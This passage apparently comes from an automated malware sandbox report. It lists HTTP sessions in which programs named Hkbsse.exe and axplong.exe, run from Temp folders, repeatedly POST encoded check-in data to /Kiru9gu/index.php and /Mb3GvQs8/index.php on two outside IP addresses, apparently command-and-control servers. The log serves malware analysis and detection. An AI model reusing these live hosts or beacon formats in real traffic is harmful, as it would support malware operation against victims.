Jun 24, 2024 00:10:29.243515015 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:29.249087095 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:29.463581085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49747	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:29.016741991 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:29.644337893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:29.645977020 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:29.836292028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49749	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:29.601613998 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:30.298723936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:30.310853958 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:30.529905081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49751	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:30.014215946 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:30.622076988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:30.625011921 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:30.826828957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49753	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:30.658751011 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:31.362179995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:31.363831997 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:31.581708908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49757	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:30.948148012 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:31.580986023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:31.587496042 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:31.778803110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49756	154.41.249.241	80	8108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:31.248409033 CEST	437	OUT	GET /Website.php HTTP/1.1 Host: starjod.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jun 24, 2024 00:10:31.793865919 CEST	1213	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Sun, 23 Jun 2024 22:10:31 GMT Content-Type: text/html Content-Length: 795 Connection: keep-alive location: https://starjod.xyz/Website.php platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 2d180e51fbd200f464d4cbe5c25b35fd-srv-edge3 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.276 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49762	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:31.730469942 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:32.423327923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:32.442058086 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:32.660015106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49763	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:32.024652004 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:32.624054909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:32.670800924 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:32.863042116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49767	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:32.823872089 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:34.436089993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.436522961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.436603069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.436667919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.436901093 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:34.661416054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49768	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:32.983696938 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:34.436181068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.436558962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.436625004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:34.437242031 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:34.632999897 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49774	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:34.758493900 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:35.418569088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
